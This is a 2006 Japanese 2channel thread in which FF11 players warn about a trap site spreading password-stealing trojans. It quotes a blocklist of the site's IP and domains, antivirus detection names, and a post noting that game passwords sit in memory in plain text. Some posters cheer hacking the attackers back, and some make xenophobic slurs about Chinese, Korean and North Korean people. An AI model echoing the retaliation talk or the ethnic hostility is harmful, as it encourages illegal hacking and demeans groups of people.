　 　　 　　　　　　　　┌────―┐.
　　　　　　　　　　　　 ||￣￣￣￣￣.||　
　　　　　　　　　　　　 ||　 ／／／／.||　　
　　　　　　　　　　♪　|| ♪ 　このスレ定期的に立つＮE！.
　　 　 　 　 　　♪ ／⌒ヽ　 ／⌒ヽ ||.　
　 　 　 　 　 　 ♪（　　　∩ (^ω^ ∩||.　
　 　 　 　　　　　　.ﾉ　　　ﾉ　丶　　　. || 　
　　　　　　　　　　 (　　ﾉ￣￣￣￣￣|　
　　　　　　　　　　 ∪∪＿＿＿＿＿.|　

IEにまた未パッチの脆弱性
ttp://headlines.yahoo.co.jp/hl?a=20060720-00000081-zdn_ep-sci
らしいので、興味半分で踏みにいったりしないようにな

あちゃー

ついにキターか

露子FF１１情報局ってとこ開いたら、悪性クッキーが何件か出てきた

あまりにも危険なにおいがするんでマジレスしときまｗ
　Name: www.ff11-info.com
　Address: 211.100.26.198
　Name: www.19800602.com
　Address: 211.100.26.198

つまり、「www.ff11-info.com」＝「www.19800602.com」です。
で、19800602.comは、というと

■ セキュリティ対策 （危険ドメイン）
　ttp://lineage.nyx.bne.jp/misc/security/?id=url-domain
　リネージュ関連のトロイの木馬が置かれていたことのあるドメインの一覧です。
　詳細については事例集の「感染源サイト」を、利用法については「基本の対策」内の
　「危険URLのブロック」、および「スパム対策」をご参照ください。
■ マビノギ公式
　ttp://www.mabinogi.jp/5th/3_free.asp?bbs_mode=view&depth=0&p_thread=22352999&num=22353&bc=10&list_mode=all&page=1
　ホムペやブログ等での周知、Overtureへ撤去要請、ファイアウォール等での遮断。
　　遮断ホスト　211.100.26.198, *.19800602.com, *.mabinogi-info.com

DLして解凍まではセーフ。exe実行はアウトってとこかな？ｗ

１年前にもまったく同じことが起こって、ネ実でもかなり騒がれたのに、
まだ引っかかるバカがいるんだな。
あれだよ、勇者がexeから接続先のサーバとID/PASSを逆アセやって引っ
こ抜いて逆にサーバハッキングして書き換えてやったってやつ。
おぼえてね？

しかもどんなものかもわからないのにexe実行するとは。それでも、rar
のおかげで、解凍すらできない奴のほうが大勢ってのが救われたな。

↓ウイルスバスター　ウイルスパターンファイル「3.583.00」で対応

icyfox.chm (27,020 bytes) as CHM_DROPPER.BJG
svchost.exe (20,009 bytes) as TROJ_DELF.CHI
UPX解凍 (43,049 bytes) as TROJ_DELF.CHI

注意喚起

　関連スレ

　ＩＤ盗難の「花の雫」が名前変えて復活？
　http://live19.2ch.net/test/read.cgi/ogame/1153412667/

パスワード保存してなくてもパス抜かれるの？

>>260

POLインスト後に設定保存とかあった気もするから、毎回入れてても抜かれるかも試練。

そんな気がするだけなんだ。

WIN版・ＰＣ関連のスレ4
http://yy10.kakiko.com/test/read.cgi/ff11/1144919919/708-

検体は送ったから早いところは既に対応済み、
遅いところはイ�`、な状況。
ちなみにバスターから来た返信。パターン配布はこれから。
icyfox.chm (27,020 bytes) as CHM_DROPPER.BJG
svchost.exe (20,009 bytes) as TROJ_DELF.CHI

e-Trustも同じ理由で送ってない。
マカフィーは米Webimmuneにアップ済み(未対応)。

Avast!とかAntiVirとかにも送ってあるので
そのうち対応されるかも、されないかも。

バスターのパターンファイルで3.283で対応したみたいですね

【社会】ガンホー社員、自社ネットゲームで仮想通貨作成・販売し1400万円荒稼ぎ→逮捕★３
http://news19.2ch.net/test/read.cgi/newsplus/1153403406/

たった一人で1400万円ですよ。これと同じような金額がどんどん中国、北朝鮮、韓国にRMTを介して
流れていってます。RMTをした人は、そのRMTしたお金で作られた反日国家ミサイルで死にたいの？

>>1は神！！！
これはいい！！！！！！！！！

IPアドレス211.100.26.198
ホスト名対応するホスト名がありません
IPアドレス
　割当国　※中国 (CN)
都道府県該当なし
市外局番該当なし
接続回線該当なし

これやべええええええええ！！！！

>>262
>>257

そういえば知り合いの自称スーパーハカーｗが、
この中国人の電話番号割り出したｗとかいってたがそんなことできるのかいな。
出来たら祭りだが。

>>268
Whoisに出てる。
http://www.apnic.net/apnic-bin/whois.pl?searchtext=211.100.26.198

ぶひひひ、ＲＭＴ止められるものなら止めてみろｗｗｗ
ツールだけには手を出すなぶひひｗｗｗ

今回のツールはどこを見てるかしらんが、POLのIDとパスはログイン後
メモリ上に格納されっぱなし。しかも平文（そのままの文字列）。

チートツールだと言ってFFが起動された状態でプログラムを実行
させることができるならいくらでもパス抜けるよ。

>>271
■eは企業としての危機感ないのかな。

ファイル実行した時にPOL起動してなければ大丈夫だよ

またハッキングされないかなぁ　罠サイト

age

>>274
前、ハッキングされてどうなったんですか？

>>276
ﾃﾎﾟﾄﾞﾝがきた

>>276
300もいってないんだから少しはスレに目を通せ

>>287
>>231見つけました〜
またハックして、今度はチベットのページでものっけられるといいな〜

中国人どうにかしろあげ

233 名前：75[] 投稿日：2006/07/20(木) 16:19:59.51 ID:un4Vzh+R
トレンドマイクロから対応したというメール来たよー

お客さまより、お送りいただきました「FF11AUTORUN.exe」をお調べいたしましたところ、
不正プログラムであることが判明いたしました。

弊社では、最新のウイルスパターンファイル「3.581.00」より
「TSPY_FANTASY.C」として検出するよう対応させていただきました。

現在コンピュータ内に、「FF11AUTORUN.exe」が存在する場合には、
不正ファイルとなりますため、削除をお願いいたします。

【ご参考：ファイルの削除方法】
　　・該当のファイルの上で右クリックをし、[削除] の上で
　　　クリックをします。
該当のファイルを削除された後、お手数をおかけいたしますが、お使いの
ウイルスバスターを最新版にアップデート後、全ドライブ検索にて
「TSPY_FANTASY.C」が検出されないことをご確認いただきますよう
お願いいたします。　TSPY_FANTASY.Cの詳細
http://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_FANTASY.C

あげ￥

ツーラーBAN祭り来たぞ。

ttp://www.playonline.com/ff11/polnews/news8138.shtml

これかな？ネ実と■e、最近いい連携してるなｗ

>>284
ネ実の情報を元にしてるからな、やつら

＞すべてのユーザーの皆様が安心してプレイできるよう、
＞今後とも外部プログラムや不正行為への対策を継続的に行ってまいります。
＞お客様のご理解とご協力をよろしくお願い申し上げます。

ってあるけどさ、■のやってることって
ネ実のウォッチとチクリユーザーのバンだけだろｗ

「お客様のご協力」って、ユーザーが協力すると
迷惑行為とかいってバンすることだよなｗ
■の脳ミソが相変わらず沸いててうれしいｗ

ドサクサ紛れに中華黒PTbanしてたりしてなｗｗｗｗｗｗ

ログイン障害って中華の報復だろ？ｗ

○＜あのひとツール使いまくって暴言まで吐いてくるんですけどー
■＜You ＢＡＮ

■eが言う協力ってのは、

・鯖が落ちても文句を言わず
・鯖の負担になるような行為をせず
・運営の手を煩わせるような行為もせず
・ひたすらFFXIを楽しむ

て感じなんだろう。

うちの鯖の業者全然減ってないんだけど、オズで有名はワープ中華も健在。

結局
■の公式アピールは

公式サイトの定期更新くらいの意味しかない

業者狩りさせろ

age